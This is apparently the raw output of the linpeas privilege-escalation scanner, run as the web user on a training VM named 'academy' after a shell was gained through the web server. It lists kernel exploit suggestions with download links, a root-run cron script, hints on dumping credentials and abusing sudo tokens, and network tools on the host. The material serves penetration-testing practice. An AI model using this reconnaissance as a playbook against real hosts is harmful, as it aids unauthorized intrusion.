Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
╚═══════════════════╝
OS: Linux version 4.19.0-16-amd64 ([email protected]) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.181-1 (2021-03-19)
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: academy
Writable folder: /dev/shm
[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /usr/bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.19.0-16-amd64 ([email protected]) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.181-1 (2021-03-19)
Distributor ID: Debian
Description: Debian GNU/Linux 10 (buster)
Release: 10
Codename: buster
╔══════════╣ Sudo version
sudo Not Found
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Date & uptime
Tue Jul 23 04:59:02 EDT 2024
04:59:02 up 2:26, 1 user, load average: 0.08, 0.02, 0.01
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
sda5
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
UUID=24d0cea7-c37b-4fd6-838e-d05cfb61a601 / ext4 errors=remount-ro 0 1
UUID=930c51cc-089d-42bd-8e30-f08b86c52dca none swap sw 0 0
/dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0
╔══════════╣ Environment
╚ Any private information inside environment variables?
HISTFILESIZE=0
OLDPWD=/var/www/html/academy/studentphoto
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
JOURNAL_STREAM=9:13145
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
INVOCATION_ID=29ad640951494fc9a5c2116dd7fa6308
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
HISTSIZE=0
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html/academy/studentphoto/tmp
HISTFILE=/dev/null
╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2019-13272] PTRACE_TRACEME
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
Exposure: highly probable
Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*}
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47133.zip
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
Comments: Requires an active PolKit agent.
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ AppArmor profile? .............. unconfined
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Seccomp enabled? ............... disabled
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)
╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
╚═══════════╝
╔══════════╣ Container related tools present (if any):
╔══════════╣ Am I Containered?
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No
╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
╚═══════╝
═╣ GCP Virtual Machine? ................. No
═╣ GCP Cloud Funtion? ................... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ Aliyun ECS? .......................... No
grep: /etc/cloud/cloud.cfg: No such file or directory
═╣ Tencent CVM? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM? ............................ No
═╣ Azure APP? ........................... No
./linpeas.sh: 2471: ./linpeas.sh: curl: not found
╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root 1 0.0 0.9 103804 9964 ? Ss 02:32 0:02 /sbin/init
root 334 0.0 0.8 40380 8624 ? Ss 02:32 0:00 /lib/systemd/systemd-journald
root 349 0.0 0.4 22064 5000 ? Ss 02:32 0:00 /lib/systemd/systemd-udevd
systemd+ 420 0.0 0.6 93084 6552 ? Ssl 02:32 0:00 /lib/systemd/systemd-timesyncd
└─(Caps) 0x0000000002000000=cap_sys_time
root 425 0.0 0.3 225824 3860 ? Ssl 02:32 0:00 /usr/sbin/rsyslogd -n -iNONE
root 427 0.0 0.2 8504 2736 ? Ss 02:32 0:00 /usr/sbin/cron -f
message+ 431 0.0 0.4 8980 4420 ? Ss 02:32 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
└─(Caps) 0x0000000020000000=cap_audit_write
root 434 0.0 0.7 19496 7400 ? Ss 02:32 0:00 /lib/systemd/systemd-logind
root 443 0.0 0.2 6620 2944 ? Ss 02:32 0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root 449 0.0 0.7 15852 7204 ? Ss 02:32 0:00 /usr/sbin/sshd -D
root 450 0.0 0.3 6924 3500 tty1 Ss 02:32 0:00 /bin/login -p --
root 799 0.0 0.4 7652 4540 tty1 S+ 02:37 0:00 _ -bash
root 544 0.0 2.5 214892 25524 ? Ss 02:32 0:01 /usr/sbin/apache2 -k start
www-data 825 0.1 2.4 219232 24812 ? S 02:37 0:16 _ /usr/sbin/apache2 -k start
www-data 1406 0.0 1.9 215856 19332 ? S 03:37 0:01 _ /usr/sbin/apache2 -k start
www-data 1411 0.0 1.9 215856 20172 ? S 03:37 0:00 _ /usr/sbin/apache2 -k start
www-data 1414 0.0 1.9 215856 19988 ? S 03:37 0:00 _ /usr/sbin/apache2 -k start
www-data 1417 0.0 1.8 215864 18960 ? S 03:37 0:00 _ /usr/sbin/apache2 -k start
www-data 1422 0.0 1.9 215864 19352 ? S 03:37 0:00 _ /usr/sbin/apache2 -k start
www-data 2242 0.0 0.0 2388 752 ? S 04:57 0:00 | _ sh -c /bin/sh
www-data 2243 0.0 0.0 2388 752 ? S 04:57 0:00 | _ /bin/sh
www-data 2255 1.5 0.2 3320 2624 ? S 04:58 0:00 | _ /bin/sh ./linpeas.sh
www-data 4987 0.0 0.1 3320 1028 ? S 04:59 0:00 | _ /bin/sh ./linpeas.sh
www-data 4991 0.0 0.3 7960 3116 ? R 04:59 0:00 | | _ ps fauxwww
www-data 4990 0.0 0.1 3320 1028 ? S 04:59 0:00 | _ /bin/sh ./linpeas.sh
www-data 1431 0.0 1.8 215864 19148 ? S 03:37 0:00 _ /usr/sbin/apache2 -k start
www-data 1432 0.0 2.0 215872 20224 ? S 03:37 0:00 _ /usr/sbin/apache2 -k start
www-data 1434 0.0 1.9 215844 19636 ? S 03:37 0:00 _ /usr/sbin/apache2 -k start
www-data 1437 0.0 1.9 215880 19936 ? S 03:37 0:00 _ /usr/sbin/apache2 -k start
mysql 573 0.0 8.8 1274452 89792 ? Ssl 02:32 0:07 /usr/sbin/mysqld
root 794 0.0 0.8 21024 8516 ? Ss 02:37 0:00 /lib/systemd/systemd --user
root 795 0.0 0.2 104768 2280 ? S 02:37 0:00 _ (sd-pam)
root 809 0.0 0.5 9488 5604 ? Ss 02:37 0:00 dhclient
╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
╔══════════╣ Processes whose PPID belongs to a different user (not root)
╚ You will know if a user can somehow spawn processes as a different user
Proc 420 with ppid 1 is run by user systemd-timesync but the ppid user is root
Proc 431 with ppid 1 is run by user messagebus but the ppid user is root
Proc 573 with ppid 1 is run by user mysql but the ppid user is root
Proc 825 with ppid 544 is run by user www-data but the ppid user is root
Proc 1406 with ppid 544 is run by user www-data but the ppid user is root
Proc 1411 with ppid 544 is run by user www-data but the ppid user is root
Proc 1414 with ppid 544 is run by user www-data but the ppid user is root
Proc 1417 with ppid 544 is run by user www-data but the ppid user is root
Proc 1422 with ppid 544 is run by user www-data but the ppid user is root
Proc 1431 with ppid 544 is run by user www-data but the ppid user is root
Proc 1432 with ppid 544 is run by user www-data but the ppid user is root
Proc 1434 with ppid 544 is run by user www-data but the ppid user is root
Proc 1437 with ppid 544 is run by user www-data but the ppid user is root
╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND PID TID TASKCMD USER FD TYPE DEVICE SIZE/OFF NODE NAME
╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd process found (dump creds from memory as root)
apache2 process found (dump creds from memory as root)
sshd Not Found
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 1077 Jun 16 2021 /etc/crontab
/etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 May 29 2021 .
drwxr-xr-x 74 root root 4096 Jul 23 04:50 ..
-rw-r--r-- 1 root root 102 Oct 11 2019 .placeholder
-rw-r--r-- 1 root root 712 Dec 17 2018 php
/etc/cron.daily:
total 40
drwxr-xr-x 2 root root 4096 May 29 2021 .
drwxr-xr-x 74 root root 4096 Jul 23 04:50 ..
-rw-r--r-- 1 root root 102 Oct 11 2019 .placeholder
-rwxr-xr-x 1 root root 539 Aug 8 2020 apache2
-rwxr-xr-x 1 root root 1478 May 12 2020 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1187 Apr 18 2019 dpkg
-rwxr-xr-x 1 root root 377 Aug 28 2018 logrotate
-rwxr-xr-x 1 root root 1123 Feb 10 2019 man-db
-rwxr-xr-x 1 root root 249 Sep 27 2017 passwd
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 May 29 2021 .
drwxr-xr-x 74 root root 4096 Jul 23 04:50 ..
-rw-r--r-- 1 root root 102 Oct 11 2019 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 May 29 2021 .
drwxr-xr-x 74 root root 4096 Jul 23 04:50 ..
-rw-r--r-- 1 root root 102 Oct 11 2019 .placeholder
/etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 May 29 2021 .
drwxr-xr-x 74 root root 4096 Jul 23 04:50 ..
-rw-r--r-- 1 root root 102 Oct 11 2019 .placeholder
-rwxr-xr-x 1 root root 813 Feb 10 2019 man-db
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * /home/grimmie/backup.sh
╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/mariadb.service could be executing some relative path
/etc/systemd/system/mysql.service could be executing some relative path
/etc/systemd/system/mysqld.service could be executing some relative path
You can't write on systemd PATH
╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2024-07-23 05:09:00 EDT 9min left Tue 2024-07-23 04:39:01 EDT 20min ago phpsessionclean.timer phpsessionclean.service
Tue 2024-07-23 06:37:40 EDT 1h 38min left Mon 2024-07-22 12:25:22 EDT 16h ago apt-daily-upgrade.timer apt-daily-upgrade.service
Tue 2024-07-23 17:17:14 EDT 12h left Tue 2024-07-23 01:28:39 EDT 3h 30min ago apt-daily.timer apt-daily.service
Wed 2024-07-24 00:00:00 EDT 19h left Tue 2024-07-23 01:28:39 EDT 3h 30min ago logrotate.timer logrotate.service
Wed 2024-07-24 00:00:00 EDT 19h left Tue 2024-07-23 01:28:39 EDT 3h 30min ago man-db.timer man-db.service
Wed 2024-07-24 02:48:04 EDT 21h left Tue 2024-07-23 01:43:53 EDT 3h 15min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/usr/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
sed: -e expression #1, char 0: no previous regular expression
/run/dbus/system_bus_socket
└─(Read Write)
/run/mysqld/mysqld.sock
└─(Read Write)
/run/systemd/fsck.progress
/run/systemd/journal/dev-log
└─(Read Write)
/run/systemd/journal/socket
└─(Read Write)
/run/systemd/journal/stdout
└─(Read Write)
/run/systemd/journal/syslog
└─(Read Write)
/run/systemd/notify
└─(Read Write)
/run/systemd/private
└─(Read Write)
/run/udev/control
/run/user/0/systemd/private
/var/run/dbus/system_bus_socket
└─(Read Write)
╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
:1.0 420 systemd-timesyn systemd-timesync :1.0 systemd-timesyncd.service - -
:1.231 7769 busctl www-data :1.231 apache2.service - -
:1.28 794 systemd root :1.28 [email protected] - -
:1.3 1 systemd root :1.3 init.scope - -
:1.4 434 systemd-logind root :1.4 systemd-logind.service - -
org.freedesktop.DBus 1 systemd root - init.scope - -
org.freedesktop.hostname1 - - - (activatable) - -
org.freedesktop.locale1 - - - (activatable) - -
org.freedesktop.login1 434 systemd-logind root :1.4 systemd-logind.service - -
org.freedesktop.network1 - - - (activatable) - -
org.freedesktop.resolve1 - - - (activatable) - -
org.freedesktop.systemd1 1 systemd root :1.3 init.scope - -
org.freedesktop.timedate1 - - - (activatable) - -
org.freedesktop.timesync1 420 systemd-timesyn systemd-timesync :1.0 systemd-timesyncd.service - -
╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
academy
127.0.0.1 localhost
127.0.1.1 academy.tcm.sec academy
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
domain localdomain
search localdomain
nameserver 192.168.92.2
tcm.sec
╔══════════╣ Interfaces
default 0.0.0.0
loopback 127.0.0.0
link-local 169.254.0.0
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:9e:e0:5d brd ff:ff:ff:ff:ff:ff
inet 192.168.92.131/24 brd 192.168.92.255 scope global dynamic ens33
valid_lft 1270sec preferred_lft 1270sec
inet6 fe80::20c:29ff:fe9e:e05d/64 scope link
valid_lft forever preferred_lft forever
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 *:80 *:*
tcp LISTEN 0 32 *:21 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
╔══════════╣ Can I sniff with tcpdump?
No
╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=33(www-data) gid=33(www-data) groups=33(www-data)
╔══════════╣ Do I have PGP keys?
gpg Not Found
netpgpkeys Not Found
netpgp Not Found
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is disabled (0), so sudo tokens could be abused
╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
grimmie:x:1000:1000:administrator,,,:/home/grimmie:/bin/bash
root:x:0:0:root:/root:/bin/bash
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(grimmie) gid=1000(administrator) groups=1000(administrator),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
uid=101(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=102(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=103(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=104(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(mysql) gid=113(mysql) groups=113(mysql)
uid=107(ftp) gid=114(ftp) groups=114(ftp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
╔══════════╣ Login now
04:59:09 up 2:26, 1 user, load average: 0.37, 0.08, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 01:32 3:26m 0.03s 0.01s -bash
╔══════════╣ Last logons
root tty1 Sat May 29 13:31:08 2021 - down (00:12) 0.0.0.0
reboot system boot Sat May 29 13:30:20 2021 - Sat May 29 13:43:39 2021 (00:13) 0.0.0.0
root pts/0 Sat May 29 13:16:54 2021 - Sat May 29 13:27:56 2021 (00:11) 192.168.10.31
root tty1 Sat May 29 13:16:34 2021 - down (00:11) 0.0.0.0
reboot system boot Sat May 29 13:15:21 2021 - Sat May 29 13:27:58 2021 (00:12) 0.0.0.0
root pts/0 Sat May 29 13:08:39 2021 - Sat May 29 13:14:47 2021 (00:06) 192.168.10.31
administrator tty1 Sat May 29 13:06:40 2021 - down (00:08) 0.0.0.0
reboot system boot Sat May 29 13:05:58 2021 - Sat May 29 13:14:49 2021 (00:08) 0.0.0.0
wtmp begins Sat May 29 13:05:58 2021
╔══════════╣ Last time logon each user
Username Port From Latest
root tty1 Tue Jul 23 01:32:50 -0400 2024
grimmie pts/1 192.168.10.31 Sun May 30 03:21:39 -0400 2021
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/nc
/usr/bin/nc.traditional
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/python3.7
/usr/bin/socat
/usr/bin/wget
╔══════════╣ Installed Compilers
╔══════════╣ MySQL version
mysql Ver 15.1 Distrib 10.3.27-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
═╣ MySQL connection using default root/root ........... No
═╣ MySQL connection using root/toor ................... No
═╣ MySQL connection using root/NOPASS ................. No
╔══════════╣ Searching mysql credentials and exec
From '/etc/mysql/mariadb.conf.d/50-server.cnf' Mysql user: user = mysql
Found readable /etc/mysql/my.cnf
[client-server]
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/
╔══════════╣ Analyzing MariaDB Files (limit 70)
-rw-r--r-- 1 root root 869 Oct 12 2020 /etc/mysql/mariadb.cnf
[client-server]
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/
-rw------- 1 root root 277 May 29 2021 /etc/mysql/debian.cnf
╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.38 (Debian)
Server built: 2020-08-25T20:08:29
httpd Not Found
Nginx version: nginx Not Found
/etc/apache2/conf-available/phpmyadmin.conf- <IfModule mod_mime.c>
/etc/apache2/conf-available/phpmyadmin.conf: AddType application/x-httpd-php .php
--
/etc/apache2/conf-available/phpmyadmin.conf- <FilesMatch ".+\.php$">
/etc/apache2/conf-available/phpmyadmin.conf: SetHandler application/x-httpd-php
--
/etc/apache2/conf-available/phpmyadmin.conf- <IfModule mod_mime.c>
/etc/apache2/conf-available/phpmyadmin.conf: AddType application/x-httpd-php .php
--
/etc/apache2/conf-available/phpmyadmin.conf- <FilesMatch ".+\.php$">
/etc/apache2/conf-available/phpmyadmin.conf: SetHandler application/x-httpd-php
--
/etc/apache2/conf-enabled/phpmyadmin.conf- <IfModule mod_mime.c>
/etc/apache2/conf-enabled/phpmyadmin.conf: AddType application/x-httpd-php .php
--
/etc/apache2/conf-enabled/phpmyadmin.conf- <FilesMatch ".+\.php$">
/etc/apache2/conf-enabled/phpmyadmin.conf: SetHandler application/x-httpd-php
--
/etc/apache2/conf-enabled/phpmyadmin.conf- <IfModule mod_mime.c>
/etc/apache2/conf-enabled/phpmyadmin.conf: AddType application/x-httpd-php .php
--
/etc/apache2/conf-enabled/phpmyadmin.conf- <FilesMatch ".+\.php$">
/etc/apache2/conf-enabled/phpmyadmin.conf: SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php7.3.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-available/php7.3.conf: SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php7.3.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-available/php7.3.conf: SetHandler application/x-httpd-php-source
--
/etc/apache2/mods-enabled/php7.3.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-enabled/php7.3.conf: SetHandler application/x-httpd-php
--
/etc/apache2/mods-enabled/php7.3.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-enabled/php7.3.conf: SetHandler application/x-httpd-php-source
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 May 29 2021 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 May 29 2021 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 May 29 2021 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 1332 Aug 8 2020 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 35 May 29 2021 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 71958 Feb 13 2021 /etc/php/7.3/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 71570 Feb 13 2021 /etc/php/7.3/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Mar 15 2019 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 May 29 2021 /etc/ldap
╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)
-rw-r--r-- 1 root root 174 May 29 2021 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r-- 1 root root 94 May 29 2021 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r-- 1 root root 394 May 29 2021 /etc/ssh/ssh_host_rsa_key.pub
PermitRootLogin yes
ChallengeResponseAuthentication no
UsePAM yes
══╣ Some certificates were found (out limited):
/etc/ssl/certs/ACCVRAIZ1.pem
/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem
